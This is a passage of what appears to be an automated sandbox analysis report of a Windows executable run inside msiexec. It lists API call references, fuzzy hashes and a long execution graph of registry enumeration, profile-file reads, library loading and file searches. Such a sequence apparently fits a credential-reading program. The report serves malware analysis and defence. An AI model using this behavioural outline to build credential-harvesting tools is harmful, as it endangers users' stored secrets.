                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@
                                                                                                          • String ID:
                                                                                                          • API String ID: 1033339047-0
                                                                                                          • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                          • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                          • malloc.MSVCRT ref: 00417407
                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                          • free.MSVCRT ref: 00417425
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2605342592-0
                                                                                                          • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                          • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcslen$wcscat$wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1961120804-0
                                                                                                          • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                          • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                          • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                          • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:2.1%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:0.5%
                                                                                                          Total number of Nodes:761
                                                                                                          Total number of Limit Nodes:20
                                                                                                          execution_graph 33689 40fc40 70 API calls 33864 403640 21 API calls 33690 427fa4 42 API calls 33865 412e43 _endthreadex 33866 425115 76 API calls __fprintf_l 33867 43fe40 133 API calls 33693 425115 83 API calls __fprintf_l 33694 401445 memcpy memcpy DialogBoxParamA 33695 440c40 34 API calls 32910 444c4a 32929 444e38 32910->32929 32912 444c56 GetModuleHandleA 32913 444c68 __set_app_type __p__fmode __p__commode 32912->32913 32915 444cfa 32913->32915 32916 444d02 __setusermatherr 32915->32916 32917 444d0e 32915->32917 32916->32917 32930 444e22 _controlfp 32917->32930 32919 444d13 _initterm __getmainargs _initterm 32920 444d6a GetStartupInfoA 32919->32920 32922 444d9e GetModuleHandleA 32920->32922 32931 40cf44 32922->32931 32926 444dcf _cexit 32928 444e04 32926->32928 32927 444dc8 exit 32927->32926 32929->32912 32930->32919 32982 404a99 LoadLibraryA 32931->32982 32933 40cf60 32934 40cf64 32933->32934 32990 410d0e 32933->32990 32934->32926 32934->32927 32936 40cf6f 32994 40ccd7 ??2@YAPAXI 32936->32994 32938 40cf9b 33008 407cbc 32938->33008 32943 40cfc4 33027 409825 memset 32943->33027 32944 40cfd8 33032 4096f4 memset 32944->33032 32949 40d181 ??3@YAXPAX 32952 40d1b3 32949->32952 32953 40d19f DeleteObject 32949->32953 32950 407e30 _strcmpi 32951 40cfee 32950->32951 32954 40cff2 RegDeleteKeyA 32951->32954 32955 40d007 EnumResourceTypesA 32951->32955 33056 407948 free free 32952->33056 32953->32952 32954->32949 32957 40d047 32955->32957 32958 40d02f MessageBoxA 32955->32958 32961 40d0a0 CoInitialize 32957->32961 33037 40ce70 32957->33037 32958->32949 32959 40d1c4 33057 4080d4 free 32959->33057 33054 40cc26 strncat memset RegisterClassA CreateWindowExA 32961->33054 32962 40d1cd 33058 407948 free free 32962->33058 32967 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33055 40c256 PostMessageA 32967->33055 32968 40d061 ??3@YAXPAX 32968->32952 32972 40d084 DeleteObject 32968->32972 32969 40d09e 32969->32961 32972->32952 32974 40d0f9 GetMessageA 32975 40d17b CoUninitialize 32974->32975 32976 40d10d 32974->32976 32975->32949 32977 40d113 TranslateAccelerator 32976->32977 32979 40d145 IsDialogMessage 32976->32979 32980 40d139 IsDialogMessage 32976->32980 32977->32976 32978 40d16d GetMessageA 32977->32978 32978->32975 32978->32977 32979->32978 32981 40d157 TranslateMessage DispatchMessageA 32979->32981 32980->32978 32980->32979 32981->32978 32983 404ac4 GetProcAddress 32982->32983 32984 404aec 32982->32984 32985 404ad4 32983->32985 32986 404add FreeLibrary 32983->32986 32988 404b13 32984->32988 32989 404afc MessageBoxA 32984->32989 32985->32986 32986->32984 32987 404ae8 32986->32987 32987->32984 32988->32933 32989->32933 32991 410d17 LoadLibraryA 32990->32991 32992 410d3c 32990->32992 32991->32992 32993 410d2b GetProcAddress 32991->32993 32992->32936 32993->32992 32995 40cd08 ??2@YAPAXI 32994->32995 32997 40cd26 32995->32997 32998 40cd2d 32995->32998 33066 404025 6 API calls 32997->33066 33000 40cd66 32998->33000 33001 40cd59 DeleteObject 32998->33001 33059 407088 33000->33059 33001->33000 33003 40cd6b 33062 4019b5 33003->33062 33006 4019b5 strncat 33007 40cdbf _mbscpy 33006->33007 33007->32938 33068 407948 free free 33008->33068 33011 407cf7 33013 407a1f malloc memcpy free free 33011->33013 33014 407ddc 33011->33014 33015 407d83 33011->33015 33016 407d7a free 33011->33016 33022 407e04 33011->33022 33072 40796e 7 API calls 33011->33072 33013->33011 33014->33022 33074 407a1f 33014->33074 33015->33011 33073 406f30 malloc memcpy free 33015->33073 33016->33011 33069 407a55 33022->33069 33023 407e30 33024 407e38 33023->33024 33025 407e57 33023->33025 33024->33025 33026 407e41 _strcmpi 33024->33026 33025->32943 33025->32944 33026->33024 33026->33025 33082 4097ff 33027->33082 33029 409854 33087 409731 33029->33087 33033 4097ff 3 API calls 33032->33033 33034 409723 33033->33034 33107 40966c 33034->33107 33121 4023b2 33037->33121 33043 40ced3 33205 40cdda 7 API calls 33043->33205 33044 40cece 33047 40cf3f 33044->33047 33158 40c3d0 memset GetModuleFileNameA strrchr 33044->33158 33047->32968 33047->32969 33050 40ceed 33184 40affa 33050->33184 33054->32967 33055->32974 33056->32959 33057->32962 33058->32934 33067 406fc7 memset _mbscpy 33059->33067 33061 40709f CreateFontIndirectA 33061->33003 33063 4019e1 33062->33063 33064 4019c2 strncat 33063->33064 33065 4019e5 memset LoadIconA 33063->33065 33064->33063 33065->33006 33066->32998 33067->33061 33068->33011 33070 407a65 33069->33070 33071 407a5b free 33069->33071 33070->33023 33071->33070 33072->33011 33073->33015 33075 407a38 33074->33075 33076 407a2d free 33074->33076 33081 406f30 malloc memcpy free 33075->33081 33077 407a44 33076->33077 33080 40796e 7 API calls 33077->33080 33079 407a43 33079->33077 33080->33022 33081->33079 33098 406f96 GetModuleFileNameA 33082->33098 33084 409805 strrchr 33085 409814 33084->33085 33086 409817 _mbscat 33084->33086 33085->33086 33086->33029 33099 44b090 33087->33099 33092 40930c 3 API calls 33093 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33092->33093 33094 4097c5 LoadStringA 33093->33094 33097 4097db 33094->33097 33096 4097f3 33096->32949 33097->33094 33097->33096 33106 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33097->33106 33098->33084 33100 40973e _mbscpy _mbscpy 33099->33100 33101 40930c 33100->33101 33102 44b090 33101->33102 33103 409319 memset GetPrivateProfileStringA 33102->33103 33104 409374 33103->33104 33105 409364 WritePrivateProfileStringA 33103->33105 33104->33092 33105->33104 33106->33097 33117 406f81 GetFileAttributesA 33107->33117 33109 409675 33110 4096ee 33109->33110 33111 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33109->33111 33110->32950 33118 409278 GetPrivateProfileStringA 33111->33118 33113 4096c9 33119 409278 GetPrivateProfileStringA 33113->33119 33115 4096da 33120 409278 GetPrivateProfileStringA 33115->33120 33117->33109 33118->33113 33119->33115 33120->33110 33207 409c1c 33121->33207 33124 401e69 memset 33246 410dbb 33124->33246 33127 401ec2 33270 4070e3 strlen _mbscat _mbscpy _mbscat 33127->33270 33128 401ed4 33259 406f81 GetFileAttributesA 33128->33259 33131 401ee6 strlen strlen 33133 401f15 33131->33133 33134 401f28 33131->33134 33271 4070e3 strlen _mbscat _mbscpy _mbscat 33133->33271 33260 406f81 GetFileAttributesA 33134->33260 33137 401f35 33261 401c31 33137->33261 33140 401f75 33142 402165 33140->33142 33143 401f9c memset 33140->33143 33141 401c31 5 API calls 33141->33140 33144 402195 ExpandEnvironmentStringsA 33142->33144 33145 4021a8 _strcmpi 33142->33145 33272 410b62 RegEnumKeyExA 33143->33272 33278 406f81 GetFileAttributesA 33144->33278 33145->33043 33145->33044 33148 401fd9 atoi 33149 401fef memset memset sprintf 33148->33149 33156 401fc9 33148->33156 33273 410b1e 33149->33273 33152 406f81 GetFileAttributesA 33152->33156 33153 402076 memset memset strlen strlen 33153->33156 33154 4070e3 strlen _mbscat _mbscpy _mbscat 33154->33156 33155 4020dd strlen strlen 33155->33156 33156->33142 33156->33148 33156->33152 33156->33153 33156->33154 33156->33155 33157 402167 _mbscpy 33156->33157 33277 410b62 RegEnumKeyExA 33156->33277 33157->33142 33159 40c422 33158->33159 33160 40c425 _mbscat _mbscpy _mbscpy 33158->33160 33159->33160 33161 40c49d 33160->33161 33162 40c512 33161->33162 33163 40c502 GetWindowPlacement 33161->33163 33164 40c538 33162->33164 33296 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33162->33296 33163->33162 33289 409b31 33164->33289 33168 40ba28 33169 40ba87 33168->33169 33175 40ba3c 33168->33175 33299 406c62 LoadCursorA SetCursor 33169->33299 33171 40ba8c 33300 403c16 33171->33300 33366 4107f1 33171->33366 33369 404734 33171->33369 33377 404785 33171->33377 33172 40ba43 _mbsicmp 33172->33175 33173 40baa0 33174 407e30 _strcmpi 33173->33174 33178 40bab0 33174->33178 33175->33169 33175->33172 33380 40b5e5 10 API calls 33175->33380 33176 40bafa SetCursor 33176->33050 33178->33176 33179 40baf1 qsort 33178->33179 33179->33176 33673 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33184->33673 33186 40b00e 33187 40b016 33186->33187 33188 40b01f GetStdHandle 33186->33188 33674 406d1a CreateFileA 33187->33674 33190 40b01c 33188->33190 33191 40b035 33190->33191 33192 40b12d 33190->33192 33675 406c62 LoadCursorA SetCursor 33191->33675 33679 406d77 9 API calls 33192->33679 33195 40b136 33206 40c580 28 API calls 33195->33206 33196 40b087 33203 40b0a1 33196->33203 33677 40a699 12 API calls 33196->33677 33197 40b042 33197->33196 33197->33203 33676 40a57c strlen WriteFile 33197->33676 33200 40b0d6 33201 40b116 CloseHandle 33200->33201 33202 40b11f SetCursor 33200->33202 33201->33202 33202->33195 33203->33200 33678 406d77 9 API calls 33203->33678 33205->33044 33206->33047 33219 409a32 33207->33219 33210 409c80 memcpy memcpy 33211 409cda 33210->33211 33211->33210 33212 409d18 ??2@YAPAXI ??2@YAPAXI 33211->33212 33213 408db6 12 API calls 33211->33213 33215 409d54 ??2@YAPAXI 33212->33215 33216 409d8b 33212->33216 33213->33211 33215->33216 33229 409b9c 33216->33229 33218 4023c1 33218->33124 33220 409a44 33219->33220 33221 409a3d ??3@YAXPAX 33219->33221 33222 409a52 33220->33222 33223 409a4b ??3@YAXPAX 33220->33223 33221->33220 33224 409a63 33222->33224 33225 409a5c ??3@YAXPAX 33222->33225 33223->33222 33226 409a83 ??2@YAPAXI ??2@YAPAXI 33224->33226 33227 409a73 ??3@YAXPAX 33224->33227 33228 409a7c ??3@YAXPAX 33224->33228 33225->33224 33226->33210 33227->33228 33228->33226 33230 407a55 free 33229->33230 33231 409ba5 33230->33231 33232 407a55 free 33231->33232 33233 409bad 33232->33233 33234 407a55 free 33233->33234 33235 409bb5 33234->33235 33236 407a55 free 33235->33236 33237 409bbd 33236->33237 33238 407a1f 4 API calls 33237->33238 33239 409bd0 33238->33239 33240 407a1f 4 API calls 33239->33240 33241 409bda 33240->33241 33242 407a1f 4 API calls 33241->33242 33243 409be4 33242->33243 33244 407a1f 4 API calls 33243->33244 33245 409bee 33244->33245 33245->33218 33247 410d0e 2 API calls 33246->33247 33248 410dca 33247->33248 33249 410dfd memset 33248->33249 33279 4070ae 33248->33279 33251 410e1d 33249->33251 33252 410e7f _mbscpy 33251->33252 33282 410d3d _mbscpy 33251->33282 33254 401e9e strlen strlen 33252->33254 33254->33127 33254->33128 33256 410e5b 33283 410add RegQueryValueExA 33256->33283 33258 410e73 33258->33252 33259->33131 33260->33137 33262 401c4c 33261->33262 33266 401ca1 33262->33266 33284 410add RegQueryValueExA 33262->33284 33264 401c6a 33265 401c71 strchr 33264->33265 33264->33266 33265->33266 33267 401c85 strchr 33265->33267 33266->33140 33266->33141 33267->33266 33268 401c94 33267->33268 33285 406f06 strlen 33268->33285 33270->33128 33271->33134 33272->33156 33274 410b34 33273->33274 33275 410b4c 33274->33275 33288 410add RegQueryValueExA 33274->33288 33275->33156 33277->33156 33278->33145 33280 4070bd GetVersionExA 33279->33280 33281 4070ce 33279->33281 33280->33281 33281->33249 33281->33254 33282->33256 33283->33258 33284->33264 33286 406f17 33285->33286 33287 406f1a memcpy 33285->33287 33286->33287 33287->33266 33288->33275 33290 409b40 33289->33290 33292 409b4e 33289->33292 33297 409901 memset SendMessageA 33290->33297 33293 409b99 33292->33293 33294 409b8b 33292->33294 33293->33168 33298 409868 SendMessageA 33294->33298 33296->33164 33297->33292 33298->33293 33299->33171 33301 4107f1 FreeLibrary 33300->33301 33302 403c30 LoadLibraryA 33301->33302 33303 403c74 33302->33303 33304 403c44 GetProcAddress 33302->33304 33306 4107f1 FreeLibrary 33303->33306 33304->33303 33305 403c5e 33304->33305 33305->33303 33309 403c6b 33305->33309 33307 403c7b 33306->33307 33308 404734 3 API calls 33307->33308 33310 403c86 33308->33310 33309->33307 33381 4036e5 33310->33381 33313 4036e5 27 API calls 33314 403c9a 33313->33314 33315 4036e5 27 API calls 33314->33315 33316 403ca4 33315->33316 33317 4036e5 27 API calls 33316->33317 33318 403cae 33317->33318 33393 4085d2 33318->33393 33324 403cd2 33326 403cf7 33324->33326 33545 402bd1 37 API calls 33324->33545 33327 403d1c 33326->33327 33546 402bd1 37 API calls 33326->33546 33428 402c5d 33327->33428 33331 4070ae GetVersionExA 33332 403d31 33331->33332 33334 403d61 33332->33334 33547 402b22 42 API calls 33332->33547 33336 403d97 33334->33336 33548 402b22 42 API calls 33334->33548 33337 403dcd 33336->33337 33549 402b22 42 API calls 33336->33549 33440 410808 33337->33440 33341 404785 FreeLibrary 33342 403de8 33341->33342 33444 402fdb 33342->33444 33345 402fdb 29 API calls 33346 403e00 33345->33346 33456 4032b7 33346->33456 33355 403e3b 33357 403e73 33355->33357 33358 403e46 _mbscpy 33355->33358 33503 40fb00 33357->33503 33551 40f334 333 API calls 33358->33551 33367 410807 33366->33367 33368 4107fc FreeLibrary 33366->33368 33367->33173 33368->33367 33370 404785 FreeLibrary 33369->33370 33371 40473b LoadLibraryA 33370->33371 33372 40474c GetProcAddress 33371->33372 33373 40476e 33371->33373 33372->33373 33374 404764 33372->33374 33375 404781 33373->33375 33376 404785 FreeLibrary 33373->33376 33374->33373 33375->33173 33376->33375 33378 4047a3 33377->33378 33379 404799 FreeLibrary 33377->33379 33378->33173 33379->33378 33380->33175 33382 4037c5 33381->33382 33383 4036fb 33381->33383 33382->33313 33552 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33383->33552 33385 40370e 33385->33382 33386 403716 strchr 33385->33386 33386->33382 33387 403730 33386->33387 33553 4021b6 memset 33387->33553 33389 40373f _mbscpy _mbscpy strlen 33390 4037a4 _mbscpy 33389->33390 33391 403789 sprintf 33389->33391 33554 4023e5 16 API calls 33390->33554 33391->33390 33394 4085e2 33393->33394 33555 4082cd 11 API calls 33394->33555 33396 4085ec 33397 403cba 33396->33397 33398 40860b memset 33396->33398 33405 40821d 33397->33405 33557 410b62 RegEnumKeyExA 33398->33557 33400 408637 33400->33397 33401 40865c memset 33400->33401 33559 40848b 10 API calls 33400->33559 33560 410b62 RegEnumKeyExA 33400->33560 33558 410add RegQueryValueExA 33401->33558 33406 40823f 33405->33406 33407 403cc6 33406->33407 33408 408246 memset 33406->33408 33413 4086e0 33407->33413 33561 410b62 RegEnumKeyExA 33408->33561 33412 40826f 33412->33407 33562 4080ed 11 API calls 33412->33562 33563 410b62 RegEnumKeyExA 33412->33563 33564 4045db 33413->33564 33415 4088ef 33572 404656 33415->33572 33419 408737 wcslen 33419->33415 33420 40876a 33419->33420 33420->33415 33421 40877a wcsncmp 33420->33421 33423 404734 3 API calls 33420->33423 33424 404785 FreeLibrary 33420->33424 33425 408812 memset 33420->33425 33426 40883c memcpy wcschr 33420->33426 33427 4088c3 LocalFree 33420->33427 33575 40466b _mbscpy 33420->33575 33421->33420 33423->33420 33424->33420 33425->33420 33425->33426 33426->33420 33427->33420 33429 402c7a 33428->33429 33430 402c87 memset 33429->33430 33439 402d9a 33429->33439 33576 410b62 RegEnumKeyExA 33430->33576 33432 410b1e RegQueryValueExA 33433 402ce4 memset sprintf 33432->33433 33436 402cb2 33433->33436 33434 402d3a sprintf 33434->33436 33436->33432 33436->33434 33436->33439 33577 402bd1 37 API calls 33436->33577 33578 402bd1 37 API calls 33436->33578 33579 410b62 RegEnumKeyExA 33436->33579 33439->33331 33441 410816 33440->33441 33442 4107f1 FreeLibrary 33441->33442 33443 403ddd 33442->33443 33443->33341 33445 402ff9 33444->33445 33446 403006 memset 33445->33446 33447 403122 33445->33447 33580 410b62 RegEnumKeyExA 33446->33580 33447->33345 33449 403033 33449->33447 33450 410b1e RegQueryValueExA 33449->33450 33452 4030a2 memset 33449->33452 33453 410b62 RegEnumKeyExA 33449->33453 33582 402db3 24 API calls 33449->33582 33451 403058 memset sprintf 33450->33451 33451->33449 33581 410b62 RegEnumKeyExA 33452->33581 33453->33449 33457 4032d5 33456->33457 33458 4033a9 33456->33458 33583 4021b6 memset 33457->33583 33471 4034e4 memset memset 33458->33471 33460 4032e1 33584 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33460->33584 33462 4032ea 33463 4032f8 memset GetPrivateProfileSectionA 33462->33463 33585 4023e5 16 API calls 33462->33585 33463->33458 33468 40332f 33463->33468 33465 40339b strlen 33465->33458 33465->33468 33467 403350 strchr 33467->33468 33468->33458 33468->33465 33586 4021b6 memset 33468->33586 33587 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33468->33587 33588 4023e5 16 API calls 33468->33588 33472 410b1e RegQueryValueExA 33471->33472 33473 40353f 33472->33473 33474 40357f 33473->33474 33475 403546 _mbscpy 33473->33475 33479 403985 33474->33479 33589 406d55 strlen _mbscat 33475->33589 33477 403565 _mbscat 33590 4033f0 19 API calls 33477->33590 33591 40466b _mbscpy 33479->33591 33483 4039aa 33485 4039ff 33483->33485 33592 40f6e2 33483->33592 33608 40f460 12 API calls 33483->33608 33609 4038e8 21 API calls 33483->33609 33486 404785 FreeLibrary 33485->33486 33487 403a0b 33486->33487 33488 4037ca memset memset 33487->33488 33611 444551 memset 33488->33611 33491 4038e2 33491->33355 33550 40f334 333 API calls 33491->33550 33493 40382e 33494 406f06 2 API calls 33493->33494 33495 403843 33494->33495 33496 406f06 2 API calls 33495->33496 33497 403855 strchr 33496->33497 33498 403884 _mbscpy 33497->33498 33499 403897 strlen 33497->33499 33500 4038bf _mbscpy 33498->33500 33499->33500 33501 4038a4 sprintf 33499->33501 33620 4023e5 16 API calls 33500->33620 33501->33500 33505 40fb10 33503->33505 33504 403e7f 33513 40f96c 33504->33513 33505->33504 33506 40fb55 RegQueryValueExA 33505->33506 33506->33504 33507 40fb84 33506->33507 33508 404734 3 API calls 33507->33508 33509 40fb91 33508->33509 33509->33504 33510 40fc19 LocalFree 33509->33510 33511 40fbdd memcpy memcpy 33509->33511 33510->33504 33624 40f802 7 API calls 33511->33624 33514 4070ae GetVersionExA 33513->33514 33515 40f98d 33514->33515 33516 4045db 7 API calls 33515->33516 33517 40f9a9 33516->33517 33520 40fae6 33517->33520 33521 40fa13 memset WideCharToMultiByte 33517->33521 33518 404656 FreeLibrary 33519 403e85 33518->33519 33525 4442ea memset 33519->33525 33520->33518 33521->33517 33522 40fa43 _strnicmp 33521->33522 33522->33517 33523 40fa5b WideCharToMultiByte 33522->33523 33523->33517 33524 40fa88 WideCharToMultiByte 33523->33524 33524->33517 33526 410dbb 7 API calls 33525->33526 33527 444329 33526->33527 33625 40759e strlen strlen 33527->33625 33532 410dbb 7 API calls 33533 444350 33532->33533 33534 40759e 3 API calls 33533->33534 33535 44435a 33534->33535 33536 444212 64 API calls 33535->33536 33537 444366 memset memset 33536->33537 33538 410b1e RegQueryValueExA 33537->33538 33539 4443b9 ExpandEnvironmentStringsA strlen 33538->33539 33540 4443f4 _strcmpi 33539->33540 33541 4443e5 33539->33541 33542 403e91 33540->33542 33543 44440c 33540->33543 33541->33540 33542->33173 33544 444212 64 API calls 33543->33544 33544->33542 33545->33326 33546->33327 33547->33334 33548->33336 33549->33337 33550->33355 33551->33357 33552->33385 33553->33389 33554->33382 33556 40841c 33555->33556 33556->33396 33557->33400 33558->33400 33559->33400 33560->33400 33561->33412 33562->33412 33563->33412 33565 404656 FreeLibrary 33564->33565 33566 4045e3 LoadLibraryA 33565->33566 33567 404651 33566->33567 33568 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33566->33568 33567->33415 33567->33419 33569 40463d 33568->33569 33570 404643 33569->33570 33571 404656 FreeLibrary 33569->33571 33570->33567 33571->33567 33573 404666 33572->33573 33574 40465c FreeLibrary 33572->33574 33573->33324 33574->33573 33575->33420 33576->33436 33577->33434 33578->33436 33579->33436 33580->33449 33581->33449 33582->33449 33583->33460 33584->33462 33585->33463 33586->33467 33587->33468 33588->33468 33589->33477 33590->33474 33591->33483 33610 40466b _mbscpy 33592->33610 33594 40f6fa 33595 4045db 7 API calls 33594->33595 33596 40f708 33595->33596 33597 404734 3 API calls 33596->33597 33602 40f7e2 33596->33602 33603 40f715 33597->33603 33598 404656 FreeLibrary 33599 40f7f1 33598->33599 33600 404785 FreeLibrary 33599->33600 33601 40f7fc 33600->33601 33601->33483 33602->33598 33603->33602 33604 40f797 WideCharToMultiByte 33603->33604 33605 40f7b8 strlen 33604->33605 33606 40f7d9 LocalFree 33604->33606 33605->33606 33607 40f7c8 _mbscpy 33605->33607 33606->33602 33607->33606 33608->33483 33609->33483 33610->33594 33612 44458b 33611->33612 33615 40381a 33612->33615 33621 410add RegQueryValueExA 33612->33621 33614 4445a4 33614->33615 33622 410add RegQueryValueExA 33614->33622 33615->33491 33619 4021b6 memset 33615->33619 33617 4445c1 33617->33615 33623 444879 30 API calls 33617->33623 33619->33493 33620->33491 33621->33614 33622->33617 33623->33615 33624->33510 33626 4075c9 33625->33626 33627 4075bb _mbscat 33625->33627 33628 444212 33626->33628 33627->33626 33645 407e9d 33628->33645 33631 44424d 33632 444274 33631->33632 33633 444258 33631->33633 33653 407ef8 33631->33653 33634 407e9d 9 API calls 33632->33634 33670 444196 51 API calls 33633->33670 33642 4442a0 33634->33642 33636 407ef8 9 API calls 33636->33642 33637 4442ce 33667 407f90 33637->33667 33641 407f90 FindClose 33643 4442e4 33641->33643 33642->33636 33642->33637 33644 444212 64 API calls 33642->33644 33663 407e62 33642->33663 33643->33532 33644->33642 33646 407f90 FindClose 33645->33646 33647 407eaa 33646->33647 33648 406f06 2 API calls 33647->33648 33649 407ebd strlen strlen 33648->33649 33650 407ee1 33649->33650 33651 407eea 33649->33651 33671 4070e3 strlen _mbscat _mbscpy _mbscat 33650->33671 33651->33631 33654 407f03 FindFirstFileA 33653->33654 33655 407f24 FindNextFileA 33653->33655 33656 407f3f 33654->33656 33657 407f46 strlen strlen 33655->33657 33658 407f3a 33655->33658 33656->33657 33660 407f7f 33656->33660 33657->33660 33661 407f76 33657->33661 33659 407f90 FindClose 33658->33659 33659->33656 33660->33631 33672 4070e3 strlen _mbscat _mbscpy _mbscat 33661->33672 33664 407e6c strcmp 33663->33664 33666 407e94 33663->33666 33665 407e83 strcmp 33664->33665 33664->33666 33665->33666 33666->33642 33668 407fa3 33667->33668 33669 407f99 FindClose 33667->33669 33668->33641 33669->33668 33670->33631 33671->33651 33672->33660 33673->33186 33674->33190 33675->33197 33676->33196 33677->33203 33678->33200 33679->33195 33697 411853 RtlInitializeCriticalSection memset 33698 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 33873 40a256 13 API calls 33875 432e5b 17 API calls 33877 43fa5a 20 API calls 33700 401060 41 API calls 33880 427260 CloseHandle memset memset 33704 410c68 FindResourceA SizeofResource LoadResource LockResource 33882 405e69 14 API calls 33706 433068 15 API calls __fprintf_l 33884 414a6d 18 API calls 33885 43fe6f 134 API calls 33708 424c6d 15 API calls __fprintf_l 33886 426741 19 API calls 33710 440c70 17 API calls 33711 443c71 42 API calls 33714 427c79 24 API calls 33889 416e7e memset __fprintf_l 33717 43f400 15 API calls 33718 42800b 47 API calls 33719 425115 82 API calls __fprintf_l 33892 41960c 61 API calls 33720 43f40c 122 API calls __fprintf_l 33723 411814 InterlockedCompareExchange RtlDeleteCriticalSection 33724 43f81a 20 API calls 33726 414c20 memset memset 33727 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 33896 414625 18 API calls 33897 404225 modf 33898 403a26 strlen WriteFile 33900 40422a 12 API calls 33904 427632 memset memset memcpy 33905 40ca30 59 API calls 33906 404235 26 API calls 33729 425115 76 API calls __fprintf_l 33907 425115 77 API calls __fprintf_l 33909 44223a 38 API calls 33735 43183c 112 API calls 33910 44b2c5 _onexit __dllonexit 33915 42a6d2 memcpy __allrem 33737 405cda 60 API calls 33923 43fedc 138 API calls 33924 4116e1 16 API calls __fprintf_l 33740 4244e6 19 API calls 33742 42e8e8 127 API calls __fprintf_l 33743 4118ee RtlLeaveCriticalSection 33929 43f6ec 22 API calls 33745 425115 119 API calls __fprintf_l 33746 410cf3 EnumResourceNamesA 33932 4492f0 memcpy memcpy 33934 43fafa 18 API calls 33936 4342f9 15 API calls __fprintf_l 33747 4144fd 19 API calls 33938 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 33939 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 33942 443a84 _mbscpy 33944 43f681 17 API calls 33750 404487 22 API calls 33946 415e8c 16 API calls __fprintf_l 33754 411893 RtlDeleteCriticalSection __fprintf_l 33755 41a492 42 API calls 33950 403e96 34 API calls 33951 410e98 memset SHGetPathFromIDList SendMessageA 33757 426741 109 API calls __fprintf_l 33758 4344a2 18 API calls 33759 4094a2 10 API calls 33954 4116a6 15 API calls __fprintf_l 33955 43f6a4 17 API calls 33956 440aa3 20 API calls 33958 427430 45 API calls 33762 4090b0 7 API calls 33763 4148b0 15 API calls 33765 4118b4 RtlEnterCriticalSection 33766 4014b7 CreateWindowExA 33767 40c8b8 19 API calls 33769 4118bf RtlTryEnterCriticalSection 33963 42434a 18 API calls __fprintf_l 33965 405f53 12 API calls 33777 43f956 59 API calls 33779 40955a 17 API calls 33780 428561 36 API calls 33781 409164 7 API calls 33969 404366 19 API calls 33973 40176c ExitProcess 33976 410777 42 API calls 33786 40dd7b 51 API calls 33787 425d7c 16 API calls __fprintf_l 33978 43f6f0 25 API calls 33979 42db01 22 API calls 33788 412905 15 API calls __fprintf_l 33980 403b04 54 API calls 33981 